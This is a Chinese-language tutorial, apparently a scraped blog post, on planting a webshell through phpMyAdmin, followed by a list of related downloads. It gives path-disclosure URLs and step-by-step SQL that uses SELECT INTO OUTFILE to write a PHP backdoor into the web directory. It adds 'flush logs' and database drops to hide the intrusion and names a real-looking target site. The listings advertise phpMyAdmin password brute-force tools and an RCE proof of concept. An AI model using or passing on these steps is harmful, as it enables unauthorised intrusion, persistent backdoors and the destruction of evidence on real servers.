1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径
D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
Fatal error: Call to a member function getImgPath() on a non-object in D:\www\phpMyAdmin\themes\darkblue_orange\layout.inc.php on line 67
这里随便选择一个 数据库 我们这用MYSQL 然后点SQL 执行SQL语句
Create TABLE a (cmd text NOT NULL); 这句是 在MYSQL这个数据库中建一个 a 的表段
看到了吧 a 已经有了 然后再执行
Insert INTO a (cmd) VALUES('');
意思你应该懂了吧 就是 把PHP一句话 写到a这个表里
继续
select cmd from a into outfile 'D:/www/d.php';
这一句 就是说 把刚刚的那个 a 的表 输出到 网站的目录下的哪个文件里 我们这里把 刚暴出来的
路径写上 这里一定要注意 Windows里面的 / 这个斜刚 一定要注意 要把\ 这个斜刚换成/这个斜刚 不然PHP 不支持 就不会成功了
http://www.crystalnet.com.cn/d.php ok了 连接我们的 PHP一句话
首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */
然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下,要不就无法访问shell了,可以直接输出到phpmyadmin目录下,不知道就phpinfo) */
flush logs /* 删除日志 */
删掉刚建的joyuan数据库,直接删除或执行SQL命令:drop database joyuan;
利用PHP一句话客户端(http://linux.chaom.net/Shell.Htm)写自己的shell
PHP一句话的服务端地址就是:http://xxx/phpmyadmin/server.php
搞定,嘿嘿。
PHP一句话服务端代码:
========================================
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
========================================
①建立数据库
create database hakz /*建立数据库hakz*/
use hakz /*连接hakz数据库*/
create table shell(code text) /*建立表shell,字段code为文本型数据*/ ②插入导出shell
insert into shell(code) values ('后门代码'); /*插入shell代码*/
select * into outfile '/home/www/website/…路径/shell.php' from shell;
/*导出shell到web路径下*/
flush logs /*删除日志 这一点很重要哦*/ ③删除临时数据库
drop database hakz /*或者直接在phpmyadmin中进行可视化操作*/
最后附上几种PHP一句话服务端代码:
/*容错代码*/
/*assert 函数和 eval一样*/
_______________________________________
本篇文章来源于Vip_威寶] | 关注网络信息安全 [http://www.weibao.tk/]
详细地址为:http://www.weibao.tk/article.asp?id=223
分享到:
相关推荐
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
这里详细总结了phpmyadmin上传Webshell的方法,和利用条件,欢迎大家下载。有什么问题可以私聊我,一起探讨。
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
单文件phpmyadmin,功能强大不比phpmyadmin差,可导出导入。可执行sql语句。
phpMyAdmin - Readme =================== Version 4.3.3 A set of PHP-scripts to manage MySQL over the web. http://www.phpmyadmin.net/ Summary ------- phpMyAdmin is intended to handle the ...
作为moodle平台构建的必须,phpmyadmin便于后台数据库的管理,方便用户使用。
phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。 虽然对于新的...
phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)
phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。 虽然对于新的...
爆破出某些数据库用户,进入phpmyadmin拿shell。
通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制/删除数据等等。 管理 MySQL-server 以及单一数据库的 PHP 程序,对于不熟悉 MySQL 命令列指令的人来说, 是很方便的管理工具。 phpMyAdmin功能: 建立、...
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的...
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料...
而今phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此东西仅供网友技术进修交换利用,请勿利用于犯警用处。 MySQL数据库字典,人人就本身网上支散了! 当前版本 v1.2 MD5:541465699949f3d60...
phpMyAdmin是一款运行在服务器上的MySQL数据库管理程序,可以对数据库进行建立/复制/删除/修改数据等等操作,还可以执行SQL脚本。phpMyAdmin基于Web方式运行,下载后解压到网站根目录,然后访问即可远端管理MySQL...
phpMyAdmin批量破解工具
1. 爆破 web 网站后台,进入后台上传 webshell 3. 通过 phpmyadmin 写 webshell 4. 通过代理扫描内网 5. 通过数据库中
phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将需要合理设置MySQL用户,他只能对允许的数据库进行读/写。那要等到你看过MySQL手册中相关的部分。 phpMyAdmin 是一...